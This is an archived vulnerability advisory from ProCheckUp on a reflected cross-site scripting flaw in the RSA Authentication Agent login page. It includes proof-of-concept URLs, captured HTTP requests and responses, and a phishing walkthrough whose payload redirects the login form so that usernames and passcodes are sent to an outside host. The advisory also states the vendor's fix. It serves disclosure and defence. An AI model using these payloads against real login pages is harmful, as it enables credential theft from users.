SecurityTracker: RSA Authentication Agent Input Validation Hole in Login Page Permits Cross-Site Scripting Attacks

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PR07-44: XSS on RSA Authentication Agent login page

Vulnerability found: 5th December 2007

Vendor informed: 13th December 2007

Severity: Medium-high

Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for
Internet Information Services


Description:

RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.

Vulnerable server-side script: '/WebID/IISWebAgentIF.dll'

Unfiltered parameter: 'postdata'


Notes:

It is believed that this vulnerability was originally reported in 2005
(BID 13168). However, In the original report, only version 5.2 of the
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.


Simple XSS Proof of Concept (PoC) URLs:

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22


The injected payload in the previous examples is:
"><script>alert("XSS")</script><a b="

The following specially-crafted URL performs an advanced XSS phishing
attack. After the victim enters his/her username and passcode, the
credentials are forwarded to a third-party site (procheckup.com in this
case) and logged by the attacker:

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode
=anyvaluehere

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22


The injected payload in the previous examples is:
"><script>document.forms[0].action="http://procheckup.com?"</script><a b="


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a victim user who clicks on a link to a RSA
Authentication Agent login page. Such code would run within the context
of the target domain.

This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e.:
session IDs or passwords) to unauthorised third parties.


Fix:

The vendor has stated that this issue was addressed in the RSA
Authentication Agent 5.3.3.378. RSA customers can download the upgrade
from the RSA web site.


References:

http://www.procheckup.com/Vulnerability_2007.php
http://www.rsa.com/node.aspx?id=2807


Credits: found by Jan Fry and Adrian Pastor - ProCheckUp Ltd
(www.procheckup.com). ProCheckUp thanks RSA for being so cooperative and
responding so fast.

COMPLETE HTTP REQUEST for simple XSS PoC:

GET
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
HTTP/1.1
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
Host: target-domain.foo
Accept: */*


PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):

HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate


<HTML>
<HEAD>
~  <TITLE>RSA SecurID : Log In</TITLE>

[ SNIP ]

<INPUT TYPE=HIDDEN NAME="stage" VALUE="useridandpasscode">
<INPUT TYPE=HIDDEN NAME="referrer" VALUE="/">
<INPUT TYPE=HIDDEN NAME="sessionid" VALUE="0">
<INPUT TYPE=HIDDEN NAME="postdata"
VALUE=""><script>alert("XSS")</script><a b="">
<INPUT TYPE=HIDDEN NAME="authntype" VALUE="2">

<TABLE class="form" cellspacing="0">
<TR>
<TD class="label">User ID:</TD>
<TD class="field"><INPUT TYPE=TEXT NAME="username" VALUE=""
MAXLENGTH=32></TD>
</TR>

<TR>
<TD class="label">Passcode:</TD>
<TD class="field"><INPUT TYPE=PASSWORD NAME="passcode" VALUE=""
MAXLENGTH=16><br /><span style="color: #666;">Your Passcode is your PIN
+ the number displayed on your token (the Tokencode).</span></TD>
</TR>
</TABLE>

</div>
<P class="buttons">
<INPUT TYPE=SUBMIT VALUE="Log In">
<INPUT TYPE=RESET VALUE="Reset">
</P>

</div>

</FORM>
</div>
</BODY>
</HTML>


COMPLETE ATTACK WALK-THROUGH FOR XSS PHISHING ATTACK:

Step 1: Victim is tricked to click on the specially-crafted URL:

HTTP Request:

GET
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http:
//procheckup.com?%22%3C/script%3E%3Ca%20b=%22 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-ms-application, application/vnd.ms-xpsdocument,
application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive


Step 2: Victim fills in 'User ID' and 'Passcode' fields and clicks on
"Log In":

HTTP request - notice the victim's username and passcode are submitted
to a third-party site (procheckup.com in this case):

POST http: //procheckup.com/? HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-ms-application, application/vnd.ms-xpsdocument,
application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: procheckup.com
Content-Length: 116
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=105825218.1973702853.1197971766.1197981134.1197988777.4;
__utmz=105825218.1197971766.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);
__utmb=105825218

stage=useridandpasscode&referrer=%2F&sessionid=0&postdata=&authntype=2&username=MYUSERNAME&passcode=MYSECRETPASSWORD



Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community  for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited  or changed in any way, is
attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.


Any other use of this information is prohibited. Procheckup is not
liable for any misuse  of this information by any third party.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFID2tsoR/Hvsj3i8sRAjgRAKC0Lvl/ZeP+UpIV4XZA4z4Tvt7lhwCgsU2J
K7gMj25WIPIyHr1rDsbuSAA=
=fLsl
-----END PGP SIGNATURE-----

Go to the Top of This SecurityTracker Archive Page